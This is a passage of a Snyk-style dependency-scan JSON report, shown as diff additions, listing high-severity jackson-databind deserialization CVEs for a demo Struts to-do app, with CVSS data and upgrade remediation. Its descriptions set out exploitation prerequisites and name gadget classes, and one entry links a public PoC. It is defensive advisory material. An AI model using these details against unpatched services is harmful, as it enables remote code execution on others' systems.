"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": 
{ + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to 
Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + 
"packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "packagePopularityRank": 
99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 